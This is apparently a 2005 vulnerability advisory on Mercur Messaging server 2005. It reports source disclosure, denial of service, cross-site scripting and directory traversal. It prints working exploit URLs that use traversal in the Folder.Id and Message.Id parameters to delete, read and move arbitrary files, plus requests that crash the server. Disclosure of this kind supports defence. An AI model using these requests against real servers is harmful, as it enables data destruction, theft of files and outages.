Mercur Messaging 2005 5.0(sp2)(5010) Multiple vulnerabilities

2 MAy 2005




Synopsis:
Dr_insane has discovered multiple remote vulnerabilities in Mercur Messaging server 2005 that
can be exploited to perform denial of service attacks, expose the .ctml files source code,
Delete arbitary folders, delete arbitary files, create files with contolled content,move arbitary files
and directory traversal.




Description:


issue 1:The first vulnerability is a .ctml files source disclosure that can 
exploited by malicious people to gain knowledge of sensitive information.It is possible to
disclose the source code of ".ctml" pages by appending an URL encoded space ("%20") at the end of the file 
extension of the requested resource.



issue2: The second vulnerability is denial of service attack that can be performed to crash the server under certain
cirqumstances. By appending an url encoded character at the end of "a.ctml" it is possible to crash the server.
example:
http://[host]:1080/start.ctml%20?Session.Id=[cookie]
http://[host]:1080/start.ctml%asd?Session.Id=[cookie]
http://[host]:1080/start.ctml%20?Session.Id=[cookie]

(You have to use the above strings multiple times each to crash the server)




issue3: There is also a number of vulnerabilities that can be exploited to delete files and folders,
read arbitary files and create files with controlled content.
The problem exists because of the paramatre "Folder.Id" and "message.id" doe's not validate the
data it can accept.
example:
delete folder:
--------------
(The url below will delete the specified folder in C)
http://[host]:1080/deletefolder.ctml?Session.Id=[value]&Folder.Id=/../../../../../../../../../../../../../../../../../[some_folder]
delete file:
----------
(the url below will delete a file named "wireles.doc" in the root drive C)
http://[host]:1080/deletemessage.ctml?Session.Id=[host]&Message.Id=wirelles.doc&Session.MessagePage=1&Folder.Type=0&Folder.Id=/../../../../../../../../../../../../../../../../../../../../../../
read file:
----------
(the urls below will read the specified file)
http://[host]:1080/readmessage.ctml/?Session.Id=[value]&Message.Id=[file]&Folder.Id=/../../../../../../../../../../../../../../../../../../
http://[host]:1080/editmessage.ctml?Session.Id=[cookie]&Message.Id=/../../../../../../../../../../../../../../../../../../../../../../[file]
http://127.0.0.1:1080/origmessage.ctml?Session.Id=[cookie]&Message.Id=[file]&Folder.Id=/../../../../../../../../../../../../../../../../

write files:
------------
It is possible to write files in arbitary location with contolled content. Let's suppose that a user creates
a mail message with some content of his choise and stores in a new email folder called "xxx". The command below
will move the selected file that the user created from email folder xxx into a folder C:\aaa
http://127.0.0.1:1080/messages.ctml?Session.Id=00000060C.32A29D15.00AC5BC7&Folder.Id=xxx&Folder.Name=xxx&Folder.Type=0&Session.MessagePage=1&Message.Command=Message.MoveToFolder_0_/../../../../../../../../../../../../../../../../../../../aaa&Message.Action=%A0Go%A0&Folder.Name=xxx&Message.SearchText=&Message.Id=115693435810790.out




issue4: Finally , there are some cross site scripting attacks in sereral scripts that can be used
to conduct cross site scripting attacks and execute arbitary HTML and script code in a user's browser
session in context of a vulnerable site.



Credit:
Dr_insane
dr_insane(at)pathfinder.gr